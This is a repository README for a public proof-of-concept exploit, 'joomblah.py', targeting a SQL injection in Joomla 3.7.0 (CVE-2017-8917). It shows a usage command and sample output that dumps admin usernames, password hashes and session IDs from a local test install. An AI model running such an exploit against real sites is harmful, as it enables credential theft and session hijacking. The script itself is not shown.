Switch branches/tags
Nothing to show
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
..
Failed to load latest commit information.
README.md
joomblah.py

README.md

Exploit for Joomla 3.7.0 (CVE-2017-8917)

Another proof of concept exploit for Joomla, whoop-de-doo, this time a SQL Injection in 3.7.0.

Usage

Point the joomblah.py script at the vulnerable Joomla 3.7.0 install, it may take some time, but it will dump the users and session tables.

$ python joomblah.py http://127.0.0.1:8080
                                                                                                                    
    .---.    .-'''-.        .-'''-.                                                           
    |   |   '   _    \     '   _    \                            .---.                        
    '---' /   /` '.   \  /   /` '.   \  __  __   ___   /|        |   |            .           
    .---..   |     \  ' .   |     \  ' |  |/  `.'   `. ||        |   |          .'|           
    |   ||   '      |  '|   '      |  '|   .-.  .-.   '||        |   |         <  |           
    |   |\    \     / / \    \     / / |  |  |  |  |  |||  __    |   |    __    | |           
    |   | `.   ` ..' /   `.   ` ..' /  |  |  |  |  |  |||/'__ '. |   | .:--.'.  | | .'''-.    
    |   |    '-...-'`       '-...-'`   |  |  |  |  |  ||:/`  '. '|   |/ |   \ | | |/.'''. \   
    |   |                              |  |  |  |  |  |||     | ||   |`" __ | | |  /    | |   
    |   |                              |__|  |__|  |__|||\    / '|   | .'.''| | | |     | |   
 __.'   '                                              |/'..' / '---'/ /   | |_| |     | |   
|      '                                               '  `'-'`       \ \._,\ '/| '.    | '.  
|____.'                                                                `--'  `" '---'   '---' 

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: rlbre_users
  -  Found table: tgukl_users
  -  Extracting users from rlbre_users
 [$] Found user ['361', 'Super User', 'admin', 'admin@example.com', '$2y$10$G4ivaKw71R4uIvuHYliSke5pHoh1Q.xm.Sk29d8zpzx4xJBfPoyEK', '', '']
  -  Extracting sessions from rlbre_session
 [$] Found session ['361', '3rfv8kql26s6kvimpbchneom85', 'admin']
  -  Extracting users from tgukl_users
 [$] Found user ['883', 'Super User', 'admin', 'admin@example.com', '$2y$10$5Za2zpqTdRo5x19cvO5biOKeiyOi2iTQ3u0SSLtcs6uvIvJhvM9aG', '', '']
  -  Extracting sessions from tgukl_session

Licence

Licenced under the WTFPL